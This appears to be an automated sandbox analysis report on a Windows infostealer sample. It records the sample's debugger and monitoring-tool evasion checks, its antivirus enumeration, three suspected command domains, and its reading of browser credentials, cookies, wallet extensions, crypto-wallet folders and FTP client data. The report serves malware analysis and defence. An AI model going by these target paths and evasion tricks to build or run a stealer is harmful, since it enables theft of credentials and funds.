                Source: C:\Users\user\Desktop\LP4a6BowQN.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: SICE
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: LP4a6BowQN.exe, 00000000.00000003.1299903237.0000000004940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: steppriflej.xyz
                Source: LP4a6BowQN.exe, 00000000.00000003.1299903237.0000000004940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sendypaster.xyz
                Source: LP4a6BowQN.exe, 00000000.00000003.1299903237.0000000004940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: cuddlyready.xyz
                Source: LP4a6BowQN.exe, 00000000.00000002.1985008061.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: MProgram Manager
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: LP4a6BowQN.exe, 00000000.00000003.1506364695.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1506045565.0000000000C13000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1506435086.0000000000B8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: LP4a6BowQN.exe PID: 7624, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: LP4a6BowQN.exe, 00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wal,h
                Source: LP4a6BowQN.exeString found in binary or memory: %appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0
                Source: LP4a6BowQN.exeString found in binary or memory: Jaxx Liberty
                Source: LP4a6BowQN.exe, 00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: int.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d"
                Source: LP4a6BowQN.exe, 00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: a%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":2097152
                Source: LP4a6BowQN.exe, 00000000.00000003.1479240445.0000000000B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                Source: LP4a6BowQN.exe, 00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: um","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":
                Source: LP4a6BowQN.exe, 00000000.00000003.1479177875.0000000000BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: LP4a6BowQN.exe, 00000000.00000003.1479240445.0000000000B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
